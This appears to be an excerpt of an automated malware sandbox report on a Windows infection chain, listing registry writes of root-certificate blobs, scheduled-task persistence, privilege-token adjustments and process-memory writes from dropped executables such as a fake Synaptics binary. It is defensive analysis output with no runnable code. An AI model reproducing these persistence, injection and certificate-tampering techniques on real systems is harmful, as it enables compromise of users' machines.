Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 2508 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3060 wrote to memory of 2908 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2908 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\1.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2160 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe C:\Windows\SysWOW64\cmd.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
